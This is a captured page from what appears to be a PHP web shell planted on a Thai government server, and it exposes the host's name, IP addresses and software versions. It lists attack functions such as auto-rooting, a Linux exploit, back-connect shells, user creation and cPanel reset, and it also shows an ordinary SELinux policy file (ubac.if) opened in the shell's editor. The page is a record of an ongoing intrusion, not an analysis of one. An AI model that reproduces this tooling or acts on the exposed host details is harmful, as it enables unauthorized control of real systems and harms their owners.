Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
selinux /
devel /
include /
kernel /
[ HOME SHELL ]
Name
Size
Permission
Action
corecommands.if
23.39
KB
-rw-r--r--
corenetwork.if
2
MB
-rw-r--r--
devices.if
94.26
KB
-rw-r--r--
domain.if
31.2
KB
-rw-r--r--
files.if
137.65
KB
-rw-r--r--
filesystem.if
96.26
KB
-rw-r--r--
kernel.if
64.54
KB
-rw-r--r--
mcs.if
3.01
KB
-rw-r--r--
mls.if
19.02
KB
-rw-r--r--
selinux.if
14.58
KB
-rw-r--r--
storage.if
18.27
KB
-rw-r--r--
terminal.if
30.35
KB
-rw-r--r--
ubac.if
3.67
KB
-rw-r--r--
unlabelednet.if
88
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ubac.if
## <summary>User-based access control policy</summary> ## <required val="true"> ## Contains attributes used in UBAC policy. ## </required> ######################################## ## <summary> ## Constrain by user-based access control (UBAC). ## </summary> ## <desc> ## <p> ## Constrain the specified type by user-based ## access control (UBAC). Typically, these are ## user processes or user files that need to be ## differentiated by SELinux user. Normally this ## does not include administrative or privileged ## programs. For the UBAC rules to be enforced, ## both the subject (source) type and the object ## (target) types must be UBAC constrained. ## </p> ## </desc> ## <param name="type"> ## <summary> ## Type to be constrained by UBAC. ## </summary> ## </param> ## <infoflow type="none"/> # interface(`ubac_constrained',` gen_require(` attribute ubac_constrained_type; ') typeattribute $1 ubac_constrained_type; ') ######################################## ## <summary> ## Exempt user-based access control for files. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_file_exempt',` gen_require(` attribute ubacfile; ') typeattribute $1 ubacfile; ') ######################################## ## <summary> ## Exempt user-based access control for processes. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_process_exempt',` gen_require(` attribute ubacproc; ') typeattribute $1 ubacproc; ') ######################################## ## <summary> ## Exempt user-based access control for file descriptors. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_fd_exempt',` gen_require(` attribute ubacfd; ') typeattribute $1 ubacfd; ') ######################################## ## <summary> ## Exempt user-based access control for sockets. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_socket_exempt',` gen_require(` attribute ubacsock; ') typeattribute $1 ubacsock; ') ######################################## ## <summary> ## Exempt user-based access control for SysV IPC. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_sysvipc_exempt',` gen_require(` attribute ubacipc; ') typeattribute $1 ubacipc; ') ######################################## ## <summary> ## Exempt user-based access control for X Windows. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_xwin_exempt',` gen_require(` attribute ubacxwin; ') typeattribute $1 ubacxwin; ') ######################################## ## <summary> ## Exempt user-based access control for dbus. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_dbus_exempt',` gen_require(` attribute ubacdbus; ') typeattribute $1 ubacdbus; ') ######################################## ## <summary> ## Exempt user-based access control for keys. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_key_exempt',` gen_require(` attribute ubackey; ') typeattribute $1 ubackey; ') ######################################## ## <summary> ## Exempt user-based access control for databases. ## </summary> ## <param name="domain"> ## <summary> ## Domain to be exempted. ## </summary> ## </param> # interface(`ubac_db_exempt',` gen_require(` attribute ubacdb; ') typeattribute $1 ubacdb; ')
Close